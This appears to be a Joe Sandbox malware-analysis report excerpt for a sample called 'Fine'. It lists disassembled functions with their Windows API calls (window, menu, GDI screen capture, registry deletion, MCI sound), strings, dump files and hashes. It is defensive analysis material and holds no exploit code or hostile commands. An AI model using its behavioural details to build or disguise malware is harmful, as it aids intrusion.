                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0026A990
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 0026A9A7
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 0026A9B3
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0026A9C9
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0026AC15
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0026AC33
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0026AC54
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 0026AC73
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0026AC95
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 0026ACBB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                                            • String ID: @$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3962739598-3786402266
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8df97bf4d01f75a5c7c106fb747b96f5ac05d7ff3d763a101b887019ccd76fde
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9bf2cc654422d29071c3e1181e8753b57d83213cb6337ad4fe5175ee0924e644
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8df97bf4d01f75a5c7c106fb747b96f5ac05d7ff3d763a101b887019ccd76fde
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EB1793161021ADFDF14CF68C9897AE7BB2BF44704F18806AED45AB295DB70A9A0CF51
                                                                                                                                                                                                                                                                                                                            Function 0026976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002697B6
                                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 002697C6
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 002697D1
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00269879
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0026992B
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00269948
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00269958
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0026998A
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002699CC
                                                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002699FD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                                            • String ID: 0$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1026556194-231160305
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dbdf861e12ee27cdb9d2b61957e0b2f7a80a810f1ee0a9024c36a1b1aa5e1efb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9baa2c925e50b119b2de2939f00014a3d5d8b376be2714a661a6f2c7d4cd92c3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbdf861e12ee27cdb9d2b61957e0b2f7a80a810f1ee0a9024c36a1b1aa5e1efb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5081DE71A183069FD710CF24D888AABBBECFF99314F10491DF98597291CB70D994CBA2
                                                                                                                                                                                                                                                                                                                            Function 00252FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00253035
                                                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00253045
                                                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00253051
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0025305E
                                                                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002530CA
                                                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00253109
                                                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0025312D
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00253135
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0025313E
                                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00253145
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00253150
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ea2b01ae8be7e568d7d37b3687c434a5bad071265a30c479482f65807b671666
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2b0ddb95b94ed8db5bee97b9ac96791e04712936a3d861fff3feec08772ca235
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea2b01ae8be7e568d7d37b3687c434a5bad071265a30c479482f65807b671666
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE610375E10219EFCF04CFA4D888EAEBBB5FF48310F208419E959A7250D7B1AA51CF94
                                                                                                                                                                                                                                                                                                                            Function 002352AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 002352E6
                                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00235328
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00235339
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00235345
                                                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0023537A
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 002353B2
                                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 002353EB
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00235445
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00235477
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 002354EF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e4588d5df7f174a83459060aef0149f4e2ee4959e6f2bcff8dab8b206c4c3aa8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 54bb4864e124d9337cf1132b3bc14af94341999d27f96891ae29a9e7bf291d54
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4588d5df7f174a83459060aef0149f4e2ee4959e6f2bcff8dab8b206c4c3aa8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6991F1B1114B1BAFDB08CF24D894BAAB7E9FF14304F404519FA8A82191EB71ED65CB91
                                                                                                                                                                                                                                                                                                                            Function 0023C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(002A29C0,000000FF,00000000,00000030), ref: 0023C973
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(002A29C0,00000004,00000000,00000030), ref: 0023C9A8
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0023C9BA
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0023CA00
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0023CA1D
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 0023CA49
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 0023CA90
                                                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0023CAD6
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0023CAEB
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0023CB0C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 630abd36841cbcd9ce02bc50ae5a90959927968967fb92df1a49383685e2456c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5f8401d704269e40ddd13a8d9b616c031d578141a9974c5b21451e8f441c51ea
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 630abd36841cbcd9ce02bc50ae5a90959927968967fb92df1a49383685e2456c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D61A5B0A2024AAFDF11CF64DC89AFEBBB9FB05348F244055E951B3291D770AD25CB61
                                                                                                                                                                                                                                                                                                                            Function 0023E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0023E4D4
                                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0023E4FA
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E504
                                                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0023E554
                                                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0023E570
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6f85a710c893f25ac38cf300e66221c5afeb56ab55e76eec51ee07bedf8eb33a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9be6f4e5d0e789bb73c2d04b25dde2c50c9c99318bd99f0d37d5a9b9381340bb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f85a710c893f25ac38cf300e66221c5afeb56ab55e76eec51ee07bedf8eb33a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1410772A1420C7BDF05AB749C47EBF77ACEF65710F010026FA01A61C2EB74DA11A6A5
                                                                                                                                                                                                                                                                                                                            Function 0025D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0025D6C4
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0025D6ED
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0025D7A8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0025D70A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0025D71D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0025D72F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0025D765
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0025D788
                                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0025D753
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bbe7fa545f27893290d1d76668d6c06ad78cce4b04925bee38d4a5d2a7075741
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2c42536c1077c223b26e43005e222f04b516f75a0a17e5b79ab7be77a8ffdb78
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbe7fa545f27893290d1d76668d6c06ad78cce4b04925bee38d4a5d2a7075741
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86317E71E1112DBBDB309F91EC88EEFBB7CEF4A711F004065E805E2100DAB09E499AA4
                                                                                                                                                                                                                                                                                                                            Function 0023EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 0023EFCB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EF215: timeGetTime.WINMM(?,?,0023EFEB), ref: 001EF219
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0023EFF8
                                                                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0023F01C
                                                                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0023F03E
                                                                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 0023F05D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0023F06B
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0023F08A
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 0023F095
                                                                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 0023F0A1
                                                                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 0023F0B2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3b1a8fa4cba45342b3e7549d7ef8ae4ead18326c647207b6e0d4672ffab5c46f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0abd3e8cc8a1e5bb6be908df2466fa709673b6647338767d7da24c6073a9d639
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b1a8fa4cba45342b3e7549d7ef8ae4ead18326c647207b6e0d4672ffab5c46f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3221C6B1E10209BFE7116F24FE8DB26BB6DFB46B54F004025F90592276DFB19C148A52
                                                                                                                                                                                                                                                                                                                            Function 0023F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0023F374
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0023F38A
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023F39B
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0023F3AD
                                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0023F3BE
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
